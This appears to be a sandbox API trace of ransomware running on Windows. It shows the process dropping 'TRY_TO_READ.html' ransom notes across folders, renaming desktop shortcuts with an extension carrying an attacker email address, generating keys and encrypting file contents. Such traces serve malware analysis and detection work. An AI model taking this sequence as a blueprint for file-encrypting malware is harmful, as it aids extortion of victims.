	[0100.777] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", cAlternateFileName="{CF2BE~1.610")) returned 1
	[0100.777] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.780] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", cAlternateFileName="{E5127~1.250")) returned 1
	[0100.780] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.783] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{e52a6842-b0ac-476e-b48f-378a97a67346}", cAlternateFileName="{E52A6~1")) returned 1
	[0100.783] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.786] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1
	[0100.786] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.789] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{f325f05b-f963-4640-a43b-c8a494cdda0f}", cAlternateFileName="{F325F~1")) returned 1
	[0100.789] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.794] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1
	[0100.794] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.796] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0
	[0100.796] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Start Menu\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0xffffffff
	[0100.796] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Sun\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xca824fd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da8b0
	[0100.797] FindNextFileW (in: hFindFile=0x5da8b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xca824fd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.797] FindNextFileW (in: hFindFile=0x5da8b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1
	[0100.797] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Sun\\Java\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\sun\\java\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d0
	[0100.798] FindNextFileW (in: hFindFile=0x5da8b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca824fd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca824fd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.798] FindNextFileW (in: hFindFile=0x5da8b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca824fd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca824fd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.798] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Templates\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca824fd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca824fd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0100.798] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Desktop\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da8f0
	[0100.799] FindNextFileW (in: hFindFile=0x5da8f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.799] FindNextFileW (in: hFindFile=0x5da8f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1
	[0100.799] FindNextFileW (in: hFindFile=0x5da8f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.799] FindNextFileW (in: hFindFile=0x5da8f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1
	[0100.799] FindNextFileW (in: hFindFile=0x5da8f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1
	[0100.799] FindNextFileW (in: hFindFile=0x5da8f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.799] FindNextFileW (in: hFindFile=0x5da8f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.799] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.799] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.799] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", dwFileAttributes=0x80) returned 1
	[0100.799] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 44
	[0100.799] GetProcessHeap () returned 0x540000
	[0100.799] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xbe) returned 0x5919d0
	[0100.799] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk"
	[0100.799] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.800] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.803] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d4
	[0100.803] GetProcessHeap () returned 0x540000
	[0100.803] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.803] GetFileSizeEx (in: hFile=0x4d4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1157) returned 1
	[0100.803] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x485
	[0100.803] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.803] GetProcessHeap () returned 0x540000
	[0100.803] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.803] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.805] WriteFile (in: hFile=0x4d4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.806] WriteFile (in: hFile=0x4d4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.806] WriteFile (in: hFile=0x4d4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.806] ReadFile (in: hFile=0x4d4, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x485, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x485, lpOverlapped=0x0) returned 1
	[0100.806] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=-1157, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.806] WriteFile (in: hFile=0x4d4, lpBuffer=0x607bb8*, nNumberOfBytesToWrite=0x485, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607bb8*, lpNumberOfBytesWritten=0x3a1f778*=0x485, lpOverlapped=0x0) returned 1
	[0100.807] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.807] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.807] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk", dwFileAttributes=0x80) returned 1
	[0100.807] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 42
	[0100.807] GetProcessHeap () returned 0x540000
	[0100.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xba) returned 0x5919d0
	[0100.807] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk"
	[0100.807] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.807] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.810] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d4
	[0100.810] GetProcessHeap () returned 0x540000
	[0100.810] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.810] GetFileSizeEx (in: hFile=0x4d4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2257) returned 1
	[0100.810] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8d1
	[0100.810] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.811] GetProcessHeap () returned 0x540000
	[0100.811] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.811] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.811] WriteFile (in: hFile=0x4d4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.811] WriteFile (in: hFile=0x4d4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.812] WriteFile (in: hFile=0x4d4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.812] ReadFile (in: hFile=0x4d4, lpBuffer=0x607bb8, nNumberOfBytesToRead=0x8d1, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607bb8*, lpNumberOfBytesRead=0x3a1f778*=0x8d1, lpOverlapped=0x0) returned 1
	[0100.812] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=-2257, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.812] WriteFile (in: hFile=0x4d4, lpBuffer=0x608498*, nNumberOfBytesToWrite=0x8d1, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x608498*, lpNumberOfBytesWritten=0x3a1f778*=0x8d1, lpOverlapped=0x0) returned 1
	[0100.812] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.812] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.812] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.812] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\desktop.ini") returned 36
	[0100.812] GetProcessHeap () returned 0x540000
	[0100.812] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xae) returned 0x599528
	[0100.812] lstrcpyW (in: lpString1=0x599528, lpString2="C:\\\\Users\\Public\\Desktop\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Desktop\\desktop.ini") returned="C:\\\\Users\\Public\\Desktop\\desktop.ini"
